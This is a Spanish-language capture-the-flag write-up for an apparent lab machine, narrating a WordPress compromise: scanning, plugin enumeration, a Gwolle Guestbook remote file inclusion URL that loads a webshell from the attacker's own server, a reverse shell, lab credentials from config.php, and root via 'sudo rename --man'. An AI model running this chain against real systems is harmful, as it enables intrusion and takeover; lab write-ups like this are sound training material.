Hacemos el escaneo con nmap:
Esto es lo que corre dentro del puerto 80:
Hacemos fuzzing y vemos que corre un directorio llamado wordpress:
Accedemos a dicho directorio, donde vemos que se trata de un wordpress, pero que no le carga correctamente la información:
Por lo que vemos el código fuente y detectamos un dominio:
Lo añadimos al /etc/hosts:
Y ya nos carga bien la página:
Procedemos a enumerar posibles usuarios y plugins de este wordpress, pero debemos de activar el modo agresivo:
wpscan --url http://192.168.0.37/wordpress -e p --plugins-detection aggressive
Y tenemos la siguiente ruta:
Y detectamos la versión:
Y tenemos en exploitdb un exploit de remote file inclusion:
Y por aquí tenemos las instrucciones donde se nos dice que tenemos que estar alojando en un servidor web el comando malicioso que queramos ejecutar en la máquina víctima:
Por lo que nos preparamos el servidor web malicioso donde vamos a estar alojando una webshell:
Lo pegamos:
Pero no funciona, y vemos en la petición del servidor de python que busca otro archivo:
Por lo que vamos a renombrar la webshell a este mismo nombre:
Volvemos a levantar un servidor http y hacemos la petición con el nuevo nombre:
Y ahora vemos el resultado del comando:
http://remote.nyx/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.32:8000/shell.php&cmd=whoami
Obtenemos la reverse shell de revshells url encodeada:
Lo pegamos y obtenemos la reverse shell:
Y dentro del archivo config.php en el directorio wordpress nos encontramos con unas credenciales:
Tenemos la contraseña del usuario Tiago:
tiago:WPr00t3d123!
Tenemos el siguiente binario que podemos ejecutarlo como root:
Si ejecutamos el menú de ayuda del programa, vemos que podemos ejecutar las páginas man como root:
Lo ejecutamos y una vez dentro lanzamos el comando de una bash:
sudo /usr/bin/rename --man
Y ya somos root:




























